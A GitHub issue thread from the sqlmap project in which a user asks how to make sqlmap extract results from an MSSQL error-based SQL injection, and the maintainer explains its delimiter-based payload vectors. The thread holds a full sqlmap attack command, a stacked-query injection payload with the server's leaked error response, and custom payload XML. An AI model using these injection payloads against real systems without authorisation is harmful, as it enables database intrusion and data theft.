### ISSUE TITLE
How to teach sqlmap grep a result in error based injection

### ISSUE THREAD

**Issue by joaozl** [sqlmapproject/sqlmap#3818]
Hello to all, I would like to ask your help for teaching sqlmap grep a result in a response.

Command
############
python sqlmap.py -r req --prefix="0,'','','','','';" --random-agent --proxy=http://127.0.0.1:1411 --force-ssl --technique=E --dbms=MSSQL --level=5 --risk=3 --flush-session --current-user --skip-waf -p parameter --string="failed when converting the nvarchar value" -v 3 --text-only
############

With this command the sqlmap can result in the following response:

#########################################################
Code 500 response

Exec funcFoo 0,'','','','',''; SELECT CONVERT(INT,(SELECT USER))#,'','','','','' <font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e07'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'database_user' to data type int.</font>
<p>
#############################

The sqlmap should identifier the result of the query "Select user" -> ('database_user')
I would like to show and mark for the sqlmap this result, How can I do this kind of operation?

#############################
Payload xml

I did not find a clear tutorial about how to construct this, but I tried the following:

    <test>
        <title>test</title>
        <stype>2</stype>
        <level>1</level>
        <risk>1</risk>
        <clause>1,8,9</clause>
        <where>1</where>
        <vector>SELECT CONVERT(INT,([QUERY]))</vector>
        <request>
            <payload>SELECT CONVERT(INT,(SELECT USER))</payload>
        </request>
        <response>
           <grep>[DELIMITER_START]Conversion failed when converting the nvarchar value(?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
        </response>
        <details>
            <dbms>Microsoft SQL Server</dbms>
            <dbms>Sybase</dbms>
            <os>Windows</os>
        </details>
    </test>

This part in the xml payload error based - generated the mention response
#####################
this query works -> SELECT CONVERT(INT,(SELECT USER))

Normal request (without using sqlmap)

parameter=0,'','','','',''; SELECT CONVERT(INT,(SELECT USER))&parameter2=2

#####################

To sum up I would like help to make sqlmap identifier the result in the response to automated the injection.

I really appreciate all the attention and help.

**Comment by huitc** [comment]
`Conversion failed when converting the nvarchar value 'database_user' to data type int`
TO DATA TYPE INTTTTTTTTTTT, so.. you cant get it

**Comment by stamparm** [comment]
@joaozl real question is why sqlmap failed with default payload? Answer to that question would be also the answer to this whole issue. If something blocked it, sqlmap won't be able to help.

sqlmap requires usage of concatenated randomly selected prefix and suffix values. That way it "greps" the results. From your report it is not clear why are you suddenly dropping the regular routine. Also, if something is blocking concatenation of prefix and suffix values you'll have more problems when you'll try to retrieve other data.

Regular payload/vector (just for the record) is:

```
<vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
```

**Comment by joaozl** [comment]
In this injection we don't need to use payloads like " AND/OR [%placeholder%] .." , It is possible to use a normal query like: "SELECT CONVERT(INT,(SELECT USER))"

The default payload.xml file did not identifier the error based injection (That is why I modified the payload.xml to cause the response with the expected result).

My question is how can I teach the sqlmap to get the query results from the responses.

**Comment by stamparm** [comment]
In such way to introduce `'[DELIMITER_START]'` and `'[DELIMITER_STOP]'` around the subquery itself. sqlmap will automatically recognize reflected boundaries (those delimiters) and grep out the inner part.

**Comment by Rajpoot9596** [comment]
Hello I Want To Solve False Positive Or Unexploitable please Help Me
